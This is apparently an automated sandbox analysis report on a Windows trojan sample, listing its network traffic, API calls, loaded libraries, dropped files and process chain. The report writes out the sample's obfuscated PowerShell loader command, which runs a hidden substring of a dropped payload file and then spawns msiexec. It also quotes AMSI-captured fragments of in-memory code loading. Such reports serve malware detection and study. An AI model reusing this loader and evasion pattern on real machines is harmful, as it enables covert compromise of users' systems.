      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51647
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51648
      Source: unknownNetwork traffic detected: HTTP traffic on port 51656 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51645
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51646
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51649
      Source: unknownNetwork traffic detected: HTTP traffic on port 51650 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51661
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51662
      Source: unknownNetwork traffic detected: HTTP traffic on port 51652 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51660
      Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51663
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51664
      Source: unknownNetwork traffic detected: HTTP traffic on port 51648 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51663 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51661 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51646 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51655 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51658
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51659
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51656
      Source: unknownNetwork traffic detected: HTTP traffic on port 51653 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51657
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51650
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51651
      Source: unknownNetwork traffic detected: HTTP traffic on port 51651 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51654
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51655
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51652
      Source: unknownNetwork traffic detected: HTTP traffic on port 51657 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51653
      Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51645 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51649 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51660 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51647 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51664 -> 443
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51645 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.5:51646 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51651 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51653 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51657 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51659 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51661 version: TLS 1.2
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040518A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040518A

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exeJump to dropped file
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00403229 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403229
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_004065470_2_00406547
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00406D1E0_2_00406D1E
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_004049C70_2_004049C7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_077F24C02_2_077F24C0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_077F77382_2_077F7738
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_077FABF82_2_077FABF8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_077F76E82_2_077F76E8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_077FDE8B2_2_077FDE8B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0797C4962_2_0797C496
      Source: yMXFgPOdf2.exe, 00000000.00000000.2061339112.000000000044F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametrikolores.exe> vs yMXFgPOdf2.exe
      Source: yMXFgPOdf2.exeBinary or memory string: OriginalFilenametrikolores.exe> vs yMXFgPOdf2.exe
      Source: yMXFgPOdf2.exe.2.drBinary or memory string: OriginalFilenametrikolores.exe> vs yMXFgPOdf2.exe
      Source: yMXFgPOdf2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.evad.winEXE@6/12@2/2
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00404481 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404481
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile created: C:\Users\user\AppData\Roaming\postarmisticeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2956:120:WilError_03
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile created: C:\Users\user\AppData\Local\Temp\nss5720.tmpJump to behavior
      Source: yMXFgPOdf2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: yMXFgPOdf2.exeReversingLabs: Detection: 73%
      Source: yMXFgPOdf2.exeVirustotal: Detection: 66%
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile read: C:\Users\user\Desktop\yMXFgPOdf2.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\yMXFgPOdf2.exe "C:\Users\user\Desktop\yMXFgPOdf2.exe"
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: \System.Core.pdbEp' source: powershell.exe, 00000002.00000002.2646587855.0000000007794000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: indows\System.Core.pdbEp. source: powershell.exe, 00000002.00000002.2646587855.0000000007794000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbb#M# source: powershell.exe, 00000002.00000002.2632775743.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000002.00000002.2654376691.000000000ABA2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3919921584.0000000005692000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Zoologists $Kokkererer91 $Basishavnen), (Lrredskjole @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Majesticalness = [AppDomain]::CurrentDomain.GetAssembl
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pseudoanthropological)), $flintglas).DefineDynamicModule($Indexers, $false).DefineType($Ventripotent, $Pinstripe, [System.MulticastDel
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040610B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_077F1359 push eax; mov dword ptr [esp], edx2_2_077F136C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0797B04B push dword ptr [ebp+ebx-75h]; iretd 2_2_0797B051
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07970FC4 push es; iretd 2_2_07970FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096F39C1 push 8BD38B50h; iretd 2_2_096F39C6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096F3E69 push 8BD68B50h; retf 2_2_096F3E6E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
